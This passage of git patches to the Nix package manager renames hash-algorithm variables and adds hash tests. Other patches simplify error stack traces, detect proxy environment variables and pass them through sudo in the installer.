-                {"file", []() { return make_ref(FileIngestionMethod::Flat);; }},
-                {"path", []() { return make_ref(FileIngestionMethod::Recursive); }},
+                {"path", []() { return make_ref(); }},
+                {"file", []() { return make_ref(); }},
                 {"to-base16", []() { return make_ref(HashFormat::Base16); }},
                 {"to-base32", []() { return make_ref(HashFormat::Nix32); }},
                 {"to-base64", []() { return make_ref(HashFormat::Base64); }},
@@ -206,7 +239,7 @@ static int compatNixHash(int argc, char * * argv)
     // Wait until `nix hash convert` is not hidden behind experimental flags anymore.
     // warn("`nix-hash` has been deprecated in favor of `nix hash convert`.");
 
-    std::optional ha;
+    std::optional hashAlgo;
     bool flat = false;
     HashFormat hashFormat = HashFormat::Base16;
     bool truncate = false;
@@ -226,7 +259,7 @@ static int compatNixHash(int argc, char * * argv)
         else if (*arg == "--truncate") truncate = true;
         else if (*arg == "--type") {
             std::string s = getArg(*arg, arg, end);
-            ha = parseHashAlgo(s);
+            hashAlgo = parseHashAlgo(s);
         }
         else if (*arg == "--to-base16") {
             op = opTo;
@@ -253,8 +286,8 @@ static int compatNixHash(int argc, char * * argv)
 
     if (op == opHash) {
         CmdHashBase cmd(flat ? FileIngestionMethod::Flat : FileIngestionMethod::Recursive);
-        if (!ha.has_value()) ha = HashAlgorithm::MD5;
-        cmd.ha = ha.value();
+        if (!hashAlgo.has_value()) hashAlgo = HashAlgorithm::MD5;
+        cmd.hashAlgo = hashAlgo.value();
         cmd.hashFormat = hashFormat;
         cmd.truncate = truncate;
         cmd.paths = ss;
@@ -264,7 +297,7 @@ static int compatNixHash(int argc, char * * argv)
     else {
         CmdToBase cmd(hashFormat);
         cmd.args = ss;
-        if (ha.has_value()) cmd.ht = ha;
+        if (hashAlgo.has_value()) cmd.hashAlgo = hashAlgo;
         cmd.run();
     }
 
diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc
index 6e3f878d9..fabec5d88 100644
--- a/src/nix/prefetch.cc
+++ b/src/nix/prefetch.cc
@@ -10,6 +10,7 @@
 #include "eval-inline.hh"
 #include "legacy.hh"
 #include "posix-source-accessor.hh"
+#include "misc-store-flags.hh"
 
 #include 
 
@@ -284,7 +285,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON
             }}
         });
 
-        addFlag(Flag::mkHashAlgoFlag("hash-type", &hashAlgo));
+        addFlag(flag::hashAlgo("hash-type", &hashAlgo));
 
         addFlag({
             .longName = "executable",
diff --git a/tests/functional/add.sh b/tests/functional/add.sh
index 762e01dbe..a4bb0e225 100644
--- a/tests/functional/add.sh
+++ b/tests/functional/add.sh
@@ -45,3 +45,8 @@ clearStore
     [[ "$path1" == "$path2" ]]
     path4=$(nix store add --mode flat --hash-algo sha1 ./dummy)
 )
+(
+    path1=$(nix store add --mode text ./dummy)
+    path2=$(nix eval --impure --raw --expr 'builtins.toFile "dummy" (builtins.readFile ./dummy)')
+    [[ "$path1" == "$path2" ]]
+)
diff --git a/tests/functional/hash-path.sh b/tests/functional/hash-path.sh
index 6d096b29b..4ad9f8ff2 100644
--- a/tests/functional/hash-path.sh
+++ b/tests/functional/hash-path.sh
@@ -2,19 +2,24 @@ source common.sh
 
 try () {
     printf "%s" "$2" > $TEST_ROOT/vector
-    hash="$(nix-hash --flat ${FORMAT_FLAG-} --type "$1" "$TEST_ROOT/vector")"
+    hash="$(nix-hash --flat ${FORMAT+--$FORMAT} --type "$1" "$TEST_ROOT/vector")"
     if ! (( "${NO_TEST_CLASSIC-}" )) && test "$hash" != "$3"; then
         echo "try nix-hash: hash $1, expected $3, got $hash"
         exit 1
     fi
-    hash="$(nix hash file ${FORMAT_FLAG-} --type "$1" "$TEST_ROOT/vector")"
+    hash="$(nix hash file ${FORMAT+--$FORMAT} --type "$1" "$TEST_ROOT/vector")"
+    if ! (( "${NO_TEST_NIX_COMMAND-}" )) && test "$hash" != "$3"; then
+        echo "try nix hash: hash $1, expected $3, got $hash"
+        exit 1
+    fi
+    hash="$(nix hash path --mode flat ${FORMAT+--format $FORMAT} --algo "$1" "$TEST_ROOT/vector")"
     if ! (( "${NO_TEST_NIX_COMMAND-}" )) && test "$hash" != "$3"; then
         echo "try nix hash: hash $1, expected $3, got $hash"
         exit 1
     fi
 }
 
-FORMAT_FLAG=--base16
+FORMAT=base16
 try md5 "" "d41d8cd98f00b204e9800998ecf8427e"
 try md5 "a" "0cc175b9c0f1b6a831c399e269772661"
 try md5 "abc" "900150983cd24fb0d6963f7d28e17f72"
@@ -34,18 +39,18 @@ try sha256 "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq" "248d6a61d
 try sha512 "" "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e"
 try sha512 "abc" "ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a9eeee64b55d39a2192992a274fc1a836ba3c23a3feebbd454d4423643ce80e2a9ac94fa54ca49f"
 try sha512 "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq" "204a8fc6dda82f0a0ced7beb8e08a41657c16ef468b228a8279be331a703c33596fd15c13b1b07f9aa1d3bea57789ca031ad85c7a71dd70354ec631238ca3445"
-unset FORMAT_FLAG
+unset FORMAT
 
-FORMAT_FLAG=--base32
+FORMAT=base32
 try sha256 "abc" "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s"
-unset FORMAT_FLAG
+unset FORMAT
 
-FORMAT_FLAG=--sri
+FORMAT=sri
 try sha512 "" "sha512-z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXcg/SpIdNs6c5H0NE8XYXysP+DGNKHfuwvY7kxvUdBeoGlODJ6+SfaPg=="
 try sha512 "abc" "sha512-3a81oZNherrMQXNJriBBMRLm+k6JqX6iCp7u5ktV05ohkpkqJ0/BqDa6PCOj/uu9RU1EI2Q86A4qmslPpUyknw=="
 try sha512 "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq" "sha512-IEqPxt2oLwoM7XvrjgikFlfBbvRosiioJ5vjMacDwzWW/RXBOxsH+aodO+pXeJygMa2Fx6cd1wNU7GMSOMo0RQ=="
 try sha256 "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq" "sha256-JI1qYdIGOLjlwCaTDD5gOaM85Flk/yFn9uzt1BnbBsE="
-unset FORMAT_FLAG
+unset FORMAT
 
 # nix-hash [--flat] defaults to the Base16 format
 NO_TEST_NIX_COMMAND=1 try sha512 "abc" "ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a9eeee64b55d39a2192992a274fc1a836ba3c23a3feebbd454d4423643ce80e2a9ac94fa54ca49f"
@@ -56,7 +61,12 @@ NO_TEST_CLASSIC=1 try sha512 "abc" "sha512-3a81oZNherrMQXNJriBBMRLm+k6JqX6iCp7u5
 try2 () {
     hash=$(nix-hash --type "$1" $TEST_ROOT/hash-path)
     if test "$hash" != "$2"; then
-        echo "hash $1, expected $2, got $hash"
+        echo "try nix-hash; hash $1, expected $2, got $hash"
+        exit 1
+    fi
+    hash="$(nix hash path --mode nar --format base16 --algo "$1" "$TEST_ROOT/hash-path")"
+    if test "$hash" != "$2"; then
+        echo "try nix hash: hash $1, expected $2, got $hash"
         exit 1
     fi
 }

From e391fc21019a2ada9a431e195e56188add23427f Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 21:05:10 +0100
Subject: [PATCH 499/654] Add comments

---
 src/libfetchers/tarball.cc | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/src/libfetchers/tarball.cc b/src/libfetchers/tarball.cc
index e3b1fbe56..d4edbb767 100644
--- a/src/libfetchers/tarball.cc
+++ b/src/libfetchers/tarball.cc
@@ -138,6 +138,8 @@ DownloadTarballResult downloadTarball(
         cached.reset();
 
     if (cached && !cached->expired)
+        /* We previously downloaded this tarball and it's younger than
+           `tarballTtl`, so no need to check the server. */
         return attrsToResult(cached->infoAttrs);
 
     auto _res = std::make_shared>();
@@ -165,6 +167,8 @@ DownloadTarballResult downloadTarball(
     Attrs infoAttrs;
 
     if (res->cached) {
+        /* The server says that the previously downloaded version is
+           still current. */
         infoAttrs = cached->infoAttrs;
     } else {
         infoAttrs.insert_or_assign("etag", res->etag);
@@ -229,6 +233,11 @@ struct CurlInputScheme : InputScheme
             if (auto n = string2Int(*i))
                 input.attrs.insert_or_assign("lastModified", *n);
 
+        /* The URL query parameters serve two roles: specifying fetch
+           settings for Nix itself, and arbitrary data as part of the
+           HTTP request. Now that we've processed the Nix-specific
+           attributes above, remove them so we don't also send them as
+           part of the HTTP request. */
         for (auto & param : allowedAttrs())
             url.query.erase(param);
 
@@ -288,6 +297,10 @@ struct FileInputScheme : CurlInputScheme
     {
         auto input(_input);
 
+        /* Unlike TarballInputScheme, this stores downloaded files in
+           the Nix store directly, since there is little deduplication
+           benefit in using the Git cache for single big files like
+           tarballs. */
         auto file = downloadFile(store, getStrAttr(input.attrs, "url"), input.getName(), false);
 
         auto narHash = store->queryPathInfo(file.storePath)->narHash;

From 4ae5091716fa023230a779db03c1cf1e5687c6fb Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 21 Feb 2024 21:55:51 +0100
Subject: [PATCH 500/654] nix profile: suggest removal using entry name

When a file conflict arises during a package install a suggestion is
made to remove the old entry. This was previously done using the
installable URLs of the old entry. These URLs are quite verbose and
often do not equal the URL of the existing entry.

This change uses the recently introduced profile entry name for the
suggestion, resulting in a simpler output.

The improvement is easily seen in the change to the functional test.
---
 src/nix/profile.cc              | 12 ++++++------
 tests/functional/nix-profile.sh |  2 +-
 2 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index 812e703b4..fc669d5ed 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -400,13 +400,13 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
             //       See https://github.com/NixOS/nix/compare/3efa476c5439f8f6c1968a6ba20a31d1239c2f04..1fe5d172ece51a619e879c4b86f603d9495cc102
             auto findRefByFilePath = [&](Iterator begin, Iterator end) {
                 for (auto it = begin; it != end; it++) {
-                    auto & profileElement = it->second;
+                    auto & [name, profileElement] = *it;
                     for (auto & storePath : profileElement.storePaths) {
                         if (conflictError.fileA.starts_with(store->printStorePath(storePath))) {
-                            return std::pair(conflictError.fileA, profileElement.toInstallables(*store));
+                            return std::tuple(conflictError.fileA, name, profileElement.toInstallables(*store));
                         }
                         if (conflictError.fileB.starts_with(store->printStorePath(storePath))) {
-                            return std::pair(conflictError.fileB, profileElement.toInstallables(*store));
+                            return std::tuple(conflictError.fileB, name, profileElement.toInstallables(*store));
                         }
                     }
                 }
@@ -415,9 +415,9 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
             // There are 2 conflicting files. We need to find out which one is from the already installed package and
             // which one is the package that is the new package that is being installed.
             // The first matching package is the one that was already installed (original).
-            auto [originalConflictingFilePath, originalConflictingRefs] = findRefByFilePath(manifest.elements.begin(), manifest.elements.end());
+            auto [originalConflictingFilePath, originalEntryName, originalConflictingRefs] = findRefByFilePath(manifest.elements.begin(), manifest.elements.end());
             // The last matching package is the one that was going to be installed (new).
-            auto [newConflictingFilePath, newConflictingRefs] = findRefByFilePath(manifest.elements.rbegin(), manifest.elements.rend());
+            auto [newConflictingFilePath, newEntryName, newConflictingRefs] = findRefByFilePath(manifest.elements.rbegin(), manifest.elements.rend());
 
             throw Error(
                 "An existing package already provides the following file:\n"
@@ -443,7 +443,7 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
                 "  nix profile install %4% --priority %7%\n",
                 originalConflictingFilePath,
                 newConflictingFilePath,
-                concatStringsSep(" ", originalConflictingRefs),
+                originalEntryName,
                 concatStringsSep(" ", newConflictingRefs),
                 conflictError.priority,
                 conflictError.priority - 1,
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index 35a62fbe2..88b713d53 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -166,7 +166,7 @@ error: An existing package already provides the following file:
 
        To remove the existing package:
 
-         nix profile remove path:${flake1Dir}#packages.${system}.default
+         nix profile remove flake1
 
        The new package can also be installed next to the existing one by assigning a different priority.
        The conflicting packages have a priority of 5.

From 040874e4db904ecbca3964b6d22d35c423969729 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Thu, 22 Feb 2024 17:14:33 -0800
Subject: [PATCH 501/654] Print all stack frames

---
 src/libutil/error.cc | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/src/libutil/error.cc b/src/libutil/error.cc
index 4a9efc0b5..d2a3d2114 100644
--- a/src/libutil/error.cc
+++ b/src/libutil/error.cc
@@ -373,7 +373,6 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s
     // prepended to each element of the trace
     auto ellipsisIndent = "  ";
 
-    bool frameOnly = false;
     if (!einfo.traces.empty()) {
         // Stack traces seen since we last printed a chunk of `duplicate frames
         // omitted`.
@@ -384,7 +383,6 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s
 
         for (const auto & trace : einfo.traces) {
             if (trace.hint.str().empty()) continue;
-            if (frameOnly && !trace.frame) continue;
 
             if (!showTrace && count > 3) {
                 oss << "\n" << ANSI_WARNING "(stack trace truncated; use '--show-trace' to show the full trace)" ANSI_NORMAL << "\n";
@@ -400,7 +398,6 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s
             printSkippedTracesMaybe(oss, ellipsisIndent, count, skippedTraces, tracesSeen);
 
             count++;
-            frameOnly = trace.frame;
 
             printTrace(oss, ellipsisIndent, count, trace);
         }

From f05c13ecc2345cb8c668289369b066b0520b919b Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Thu, 22 Feb 2024 17:14:55 -0800
Subject: [PATCH 502/654] Remove the concept of "skipped frames"

---
 src/libexpr/eval-error.cc | 14 +++-----------
 src/libexpr/eval-error.hh |  2 +-
 src/libexpr/eval.cc       |  9 ++++-----
 src/libexpr/eval.hh       |  2 +-
 src/libexpr/primops.cc    |  7 +++----
 src/libutil/error.cc      |  7 +++----
 src/libutil/error.hh      |  3 +--
 7 files changed, 16 insertions(+), 28 deletions(-)

diff --git a/src/libexpr/eval-error.cc b/src/libexpr/eval-error.cc
index f4cdeec5c..8db03610b 100644
--- a/src/libexpr/eval-error.cc
+++ b/src/libexpr/eval-error.cc
@@ -28,15 +28,7 @@ template
 EvalErrorBuilder & EvalErrorBuilder::withTrace(PosIdx pos, const std::string_view text)
 {
     error.err.traces.push_front(
-        Trace{.pos = error.state.positions[pos], .hint = HintFmt(std::string(text)), .frame = false});
-    return *this;
-}
-
-template
-EvalErrorBuilder & EvalErrorBuilder::withFrameTrace(PosIdx pos, const std::string_view text)
-{
-    error.err.traces.push_front(
-        Trace{.pos = error.state.positions[pos], .hint = HintFmt(std::string(text)), .frame = true});
+        Trace{.pos = error.state.positions[pos], .hint = HintFmt(std::string(text))});
     return *this;
 }
 
@@ -63,9 +55,9 @@ EvalErrorBuilder & EvalErrorBuilder::withFrame(const Env & env, const Expr
 }
 
 template
-EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, HintFmt hint, bool frame)
+EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, HintFmt hint)
 {
-    error.addTrace(error.state.positions[pos], hint, frame);
+    error.addTrace(error.state.positions[pos], hint);
     return *this;
 }
 
diff --git a/src/libexpr/eval-error.hh b/src/libexpr/eval-error.hh
index 392902ad2..7e0cbe982 100644
--- a/src/libexpr/eval-error.hh
+++ b/src/libexpr/eval-error.hh
@@ -89,7 +89,7 @@ public:
 
     [[nodiscard, gnu::noinline]] EvalErrorBuilder & withFrame(const Env & e, const Expr & ex);
 
-    [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, HintFmt hint, bool frame = false);
+    [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, HintFmt hint);
 
     template
     [[nodiscard, gnu::noinline]] EvalErrorBuilder &
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 205d40b83..54b1125ce 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -811,9 +811,9 @@ void EvalState::addErrorTrace(Error & e, const char * s, const std::string & s2)
     e.addTrace(nullptr, s, s2);
 }
 
-void EvalState::addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2, bool frame) const
+void EvalState::addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2) const
 {
-    e.addTrace(positions[pos], HintFmt(s, s2), frame);
+    e.addTrace(positions[pos], HintFmt(s, s2));
 }
 
 template
@@ -1587,9 +1587,8 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value &
                         "while calling %s",
                         lambda.name
                         ? concatStrings("'", symbols[lambda.name], "'")
-                        : "anonymous lambda",
-                        true);
-                    if (pos) addErrorTrace(e, pos, "from call site%s", "", true);
+                        : "anonymous lambda");
+                    if (pos) addErrorTrace(e, pos, "from call site%s", "");
                 }
                 throw;
             }
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 42fe0d3e4..80b583eb1 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -435,7 +435,7 @@ public:
     [[gnu::noinline]]
     void addErrorTrace(Error & e, const char * s, const std::string & s2) const;
     [[gnu::noinline]]
-    void addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2, bool frame = false) const;
+    void addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2) const;
 
 public:
     /**
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 42cfa4917..835afba82 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -811,7 +811,7 @@ static void prim_addErrorContext(EvalState & state, const PosIdx pos, Value * *
         auto message = state.coerceToString(pos, *args[0], context,
                 "while evaluating the error message passed to builtins.addErrorContext",
                 false, false).toOwned();
-        e.addTrace(nullptr, HintFmt(message), true);
+        e.addTrace(nullptr, HintFmt(message));
         throw;
     }
 }
@@ -1075,7 +1075,7 @@ static void prim_derivationStrict(EvalState & state, const PosIdx pos, Value * *
         e.addTrace(nullptr, HintFmt(
                 "while evaluating derivation '%s'\n"
                 "  whose name attribute is located at %s",
-                drvName, pos), true);
+                drvName, pos));
         throw;
     }
 }
@@ -1233,8 +1233,7 @@ drvName, Bindings * attrs, Value & v)
 
         } catch (Error & e) {
             e.addTrace(state.positions[i->pos],
-                HintFmt("while evaluating attribute '%1%' of derivation '%2%'", key, drvName),
-                true);
+                HintFmt("while evaluating attribute '%1%' of derivation '%2%'", key, drvName));
             throw;
         }
     }
diff --git a/src/libutil/error.cc b/src/libutil/error.cc
index d2a3d2114..d1e864a1a 100644
--- a/src/libutil/error.cc
+++ b/src/libutil/error.cc
@@ -11,9 +11,9 @@
 
 namespace nix {
 
-void BaseError::addTrace(std::shared_ptr && e, HintFmt hint, bool frame)
+void BaseError::addTrace(std::shared_ptr && e, HintFmt hint)
 {
-    err.traces.push_front(Trace { .pos = std::move(e), .hint = hint, .frame = frame });
+    err.traces.push_front(Trace { .pos = std::move(e), .hint = hint });
 }
 
 void throwExceptionSelfCheck(){
@@ -61,8 +61,7 @@ inline bool operator<(const Trace& lhs, const Trace& rhs)
     // This formats a freshly formatted hint string and then throws it away, which
     // shouldn't be much of a problem because it only runs when pos is equal, and this function is
     // used for trace printing, which is infrequent.
-    return std::forward_as_tuple(lhs.hint.str(), lhs.frame)
-        < std::forward_as_tuple(rhs.hint.str(), rhs.frame);
+    return lhs.hint.str() < rhs.hint.str();
 }
 inline bool operator> (const Trace& lhs, const Trace& rhs) { return rhs < lhs; }
 inline bool operator<=(const Trace& lhs, const Trace& rhs) { return !(lhs > rhs); }
diff --git a/src/libutil/error.hh b/src/libutil/error.hh
index 2e5de5d32..89f5ad021 100644
--- a/src/libutil/error.hh
+++ b/src/libutil/error.hh
@@ -64,7 +64,6 @@ void printCodeLines(std::ostream & out,
 struct Trace {
     std::shared_ptr pos;
     HintFmt hint;
-    bool frame;
 };
 
 inline bool operator<(const Trace& lhs, const Trace& rhs);
@@ -162,7 +161,7 @@ public:
         addTrace(std::move(e), HintFmt(std::string(fs), args...));
     }
 
-    void addTrace(std::shared_ptr && e, HintFmt hint, bool frame = false);
+    void addTrace(std::shared_ptr && e, HintFmt hint);
 
     bool hasTrace() const { return !err.traces.empty(); }
 

From 91e89628fdfe7b08e0f61b8531edd31833330e04 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Thu, 22 Feb 2024 17:18:27 -0800
Subject: [PATCH 503/654] Make `addErrorTrace` variadic

---
 src/libexpr/eval.cc | 12 +++++++-----
 src/libexpr/eval.hh |  6 ++++--
 2 files changed, 11 insertions(+), 7 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 54b1125ce..c4e163b08 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -806,14 +806,16 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr &
     }
 }
 
-void EvalState::addErrorTrace(Error & e, const char * s, const std::string & s2) const
+template
+void EvalState::addErrorTrace(Error & e, const Args & ... formatArgs) const
 {
-    e.addTrace(nullptr, s, s2);
+    e.addTrace(nullptr, HintFmt(formatArgs...));
 }
 
-void EvalState::addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2) const
+template
+void EvalState::addErrorTrace(Error & e, const PosIdx pos, const Args & ... formatArgs) const
 {
-    e.addTrace(positions[pos], HintFmt(s, s2));
+    e.addTrace(positions[pos], HintFmt(formatArgs...));
 }
 
 template
@@ -1588,7 +1590,7 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value &
                         lambda.name
                         ? concatStrings("'", symbols[lambda.name], "'")
                         : "anonymous lambda");
-                    if (pos) addErrorTrace(e, pos, "from call site%s", "");
+                    if (pos) addErrorTrace(e, pos, "from call site");
                 }
                 throw;
             }
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 80b583eb1..01abd4eb1 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -432,10 +432,12 @@ public:
     std::string_view forceString(Value & v, NixStringContext & context, const PosIdx pos, std::string_view errorCtx);
     std::string_view forceStringNoCtx(Value & v, const PosIdx pos, std::string_view errorCtx);
 
+    template
     [[gnu::noinline]]
-    void addErrorTrace(Error & e, const char * s, const std::string & s2) const;
+    void addErrorTrace(Error & e, const Args & ... formatArgs) const;
+    template
     [[gnu::noinline]]
-    void addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2) const;
+    void addErrorTrace(Error & e, const PosIdx pos, const Args & ... formatArgs) const;
 
 public:
     /**

From fe6408b5df4a2a4c2342a02bc9f94abf4ca88a85 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Thu, 22 Feb 2024 17:58:37 -0800
Subject: [PATCH 504/654] Update snapshots

---
 tests/functional/lang/eval-fail-duplicate-traces.err.exp   | 7 +++++++
 .../eval-fail-foldlStrict-strict-op-application.err.exp    | 7 +++++++
 tests/functional/lang/eval-fail-mutual-recursion.err.exp   | 7 +++++++
 3 files changed, 21 insertions(+)

diff --git a/tests/functional/lang/eval-fail-duplicate-traces.err.exp b/tests/functional/lang/eval-fail-duplicate-traces.err.exp
index 32ad9b376..cedaebd3b 100644
--- a/tests/functional/lang/eval-fail-duplicate-traces.err.exp
+++ b/tests/functional/lang/eval-fail-duplicate-traces.err.exp
@@ -41,4 +41,11 @@ error:
              |                ^
             5|     if n > 0
 
+       … while calling the 'throw' builtin
+         at /pwd/lang/eval-fail-duplicate-traces.nix:7:10:
+            6|     then throwAfter (n - 1)
+            7|     else throw "Uh oh!";
+             |          ^
+            8| in
+
        error: Uh oh!
diff --git a/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp b/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp
index 7cb08af8a..4903bc82d 100644
--- a/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp
+++ b/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp
@@ -27,4 +27,11 @@ error:
              |      ^
             6|
 
+       … while calling the 'throw' builtin
+         at /pwd/lang/eval-fail-foldlStrict-strict-op-application.nix:5:9:
+            4|   null
+            5|   [ (_: throw "Not the final value, but is still forced!") (_: 23) ]
+             |         ^
+            6|
+
        error: Not the final value, but is still forced!
diff --git a/tests/functional/lang/eval-fail-mutual-recursion.err.exp b/tests/functional/lang/eval-fail-mutual-recursion.err.exp
index dc2e11766..c034afcd5 100644
--- a/tests/functional/lang/eval-fail-mutual-recursion.err.exp
+++ b/tests/functional/lang/eval-fail-mutual-recursion.err.exp
@@ -54,4 +54,11 @@ error:
 
        (21 duplicate frames omitted)
 
+       … while calling the 'throw' builtin
+         at /pwd/lang/eval-fail-mutual-recursion.nix:34:10:
+           33|     then throwAfterB true 10
+           34|     else throw "Uh oh!";
+             |          ^
+           35| in
+
        error: Uh oh!

From d3bff699aac0ff940e7e5551e39b53e62e780281 Mon Sep 17 00:00:00 2001
From: ramboman 
Date: Fri, 23 Feb 2024 01:05:25 -0500
Subject: [PATCH 505/654] `nix`: Fix `haveInternet` to check for proxy

---
 src/nix/main.cc | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)

diff --git a/src/nix/main.cc b/src/nix/main.cc
index 39c04069b..687c072e0 100644
--- a/src/nix/main.cc
+++ b/src/nix/main.cc
@@ -23,6 +23,7 @@
 #include 
 #include 
 #include 
+#include 
 
 #include 
 
@@ -32,6 +33,24 @@ void chrootHelper(int argc, char * * argv);
 
 namespace nix {
 
+static bool haveProxyEnvironmentVariables()
+{
+    static const char * const proxyVariables[] = {
+        "http_proxy",
+        "https_proxy",
+        "ftp_proxy",
+        "HTTP_PROXY",
+        "HTTPS_PROXY",
+        "FTP_PROXY"
+    };
+    for (auto & proxyVariable: proxyVariables) {
+        if (std::getenv(proxyVariable)) {
+            return true;
+        }
+    }
+    return false;
+}
+
 /* Check if we have a non-loopback/link-local network interface. */
 static bool haveInternet()
 {
@@ -55,6 +74,8 @@ static bool haveInternet()
         }
     }
 
+    if (haveProxyEnvironmentVariables()) return true;
+
     return false;
 }
 

From bca737dcad2401b81d60f6ecf3f163b9346b5556 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Fri, 23 Feb 2024 10:28:37 +0100
Subject: [PATCH 506/654] c++-ize the proxy detection code

Just for consistency with the rest
---
 src/nix/main.cc | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/src/nix/main.cc b/src/nix/main.cc
index 687c072e0..5af5f2e41 100644
--- a/src/nix/main.cc
+++ b/src/nix/main.cc
@@ -23,7 +23,6 @@
 #include 
 #include 
 #include 
-#include 
 
 #include 
 
@@ -35,7 +34,7 @@ namespace nix {
 
 static bool haveProxyEnvironmentVariables()
 {
-    static const char * const proxyVariables[] = {
+    static const std::vector proxyVariables = {
         "http_proxy",
         "https_proxy",
         "ftp_proxy",
@@ -44,7 +43,7 @@ static bool haveProxyEnvironmentVariables()
         "FTP_PROXY"
     };
     for (auto & proxyVariable: proxyVariables) {
-        if (std::getenv(proxyVariable)) {
+        if (getEnv(proxyVariable).has_value()) {
             return true;
         }
     }

From 24fd7e2755bed3a854f8089c2db2fed89eb07f56 Mon Sep 17 00:00:00 2001
From: ramboman 
Date: Sat, 24 Feb 2024 01:00:13 +0000
Subject: [PATCH 507/654] `install-multi-user.sh`: `_sudo`: add proxy variables
 to sudo

---
 scripts/install-multi-user.sh | 27 ++++++++++++++++++++++++++-
 1 file changed, 26 insertions(+), 1 deletion(-)

diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh
index ad3ee8881..1dbb93bf9 100644
--- a/scripts/install-multi-user.sh
+++ b/scripts/install-multi-user.sh
@@ -58,6 +58,31 @@ readonly EXTRACTED_NIX_PATH="$(dirname "$0")"
 
 readonly ROOT_HOME=~root
 
+readonly PROXY_ENVIRONMENT_VARIABLES=(
+    http_proxy
+    https_proxy
+    ftp_proxy
+    no_proxy
+    HTTP_PROXY
+    HTTPS_PROXY
+    FTP_PROXY
+    NO_PROXY
+)
+
+SUDO_EXTRA_ENVIRONMENT_VARIABLES=()
+
+setup_sudo_extra_environment_variables() {
+    local i=${#SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}
+    for variable in "${PROXY_ENVIRONMENT_VARIABLES[@]}"; do
+        if [ "x${!variable:-}" != "x" ]; then
+            SUDO_EXTRA_ENVIRONMENT_VARIABLES[i]="$variable=${!variable}"
+            i=$((i + 1))
+        fi
+    done
+}
+
+setup_sudo_extra_environment_variables
+
 if [ -t 0 ] && [ -z "${NIX_INSTALLER_YES:-}" ]; then
     readonly IS_HEADLESS='no'
 else
@@ -361,7 +386,7 @@ _sudo() {
     if is_root; then
         env "$@"
     else
-        sudo "$@"
+        sudo "${SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}" "$@"
     fi
 }
 

From 5598ce3e0f3a3cfce69d008c808920950e8c1139 Mon Sep 17 00:00:00 2001
From: zimbatm 
Date: Sat, 24 Feb 2024 11:15:58 +0100
Subject: [PATCH 508/654] ci: fix docker default tag

Docker uses "latest" as the default label instead of "master".

This change will allow to docker run ghcr.io/nixos/nix without having to
specify the label.

It keeps the :master label on docker hub for back-compat.
---
